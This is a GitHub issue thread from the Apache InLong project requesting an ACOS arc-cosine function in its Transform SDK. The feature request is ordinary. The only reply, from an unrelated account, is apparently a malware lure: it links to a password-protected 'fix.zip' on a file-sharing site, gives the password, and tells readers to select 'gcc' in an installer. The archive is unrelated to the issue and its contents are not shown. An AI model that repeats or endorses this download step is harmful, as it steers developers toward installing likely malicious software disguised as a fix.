### ISSUE TITLE
[Feature][SDK] Transform support ACOS function

### ISSUE THREAD

**Issue by ying-hua** [apache/inlong#10886]
### Description

- parent #10796 
- ACOS(numeric)
Returns the arc cosine of numeric. 

### Are you willing to submit PR?

- [X] Yes, I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://www.apache.org/foundation/policies/conduct)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
